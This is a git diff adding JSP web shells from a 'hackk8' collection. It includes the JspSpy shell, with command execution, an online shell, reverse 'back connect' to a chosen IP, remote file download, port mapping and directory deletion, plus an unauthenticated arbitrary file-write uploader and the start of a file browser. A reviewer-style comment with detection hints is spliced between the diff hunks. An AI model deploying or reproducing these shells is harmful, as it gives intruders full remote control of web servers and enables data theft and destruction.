+Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("

    "); +out.println("
    ");
    +String command = request.getParameter("command");
    +if (!Util.isEmpty(command)) {
    +Process pro = Runtime.getRuntime().exec(command);
    +BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    +String s = reader.readLine();
    +while (s != null) {
    +out.println(Util.htmlEncode(Util.getStr(s)));
    +s = reader.readLine();
    +}
    +reader.close();
    +out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); 
+} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void 
invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if 
(pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream 
output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 
+remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); 
+JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

    System Environment >>


      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//?????? 
+Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); 
+ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/minupload.jsp b/jsp/hackk8/JSP/minupload.jsp new file mode 100644 index 0000000..3994c00 --- /dev/null +++ b/jsp/hackk8/JSP/minupload.jsp @@ -0,0 +1,48 @@ + + <%@page contentType="text/html;charset=utf-8"%> + <%@page import="java.io.*,java.util.*,java.net.*"%> + + + JspDo Code By Xiao.3 + + + + <% + if(request.getParameter("context")!=null) + { //这小马有问题 上传jsp就出错 + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("上传成功!"); + } catch (FileNotFoundException ex2) { + out.println("上传失败!"); + } catch (IOException ex) { + out.println("上传失败!"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("上传失败!"); + } + } + } + %> +
    + 本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %> +
    +
    + 上传文件路径:"> +
    +
    + 上传文件内容: +
    +
    + +
    + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/other/download.jsp b/jsp/hackk8/JSP/other/download.jsp new file mode 100644 index 0000000..85c73d1 --- /dev/null +++ b/jsp/hackk8/JSP/other/download.jsp 
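Review bot: In minupload.jsp the scriptlet passes `request.getParameter("path")` straight to `new FileOutputStream(path)` and writes the `context` parameter into it, and no authentication, session check or base-directory confinement is visible anywhere in this hunk. Any client that can reach the page can therefore create or overwrite any file the servlet container's account may write, and the form additionally prints `request.getRealPath(request.getServletPath())`, which discloses the absolute deployment path. If the file is being kept as a detection sample, it should open with a header such as `<%-- SAMPLE ONLY: unauthenticated arbitrary file write, never deploy --%>` and be stored with a non-executable extension outside any webroot, as the first file in this commit does with `.txt`. For hunting, the useful indicators are a request parameter flowing directly into `FileOutputStream` inside a very small JSP, and new `.jsp` files appearing under a web application directory outside a deployment window.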
@@ -0,0 +1,1913 @@ +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... 
+ * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + 
starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? 
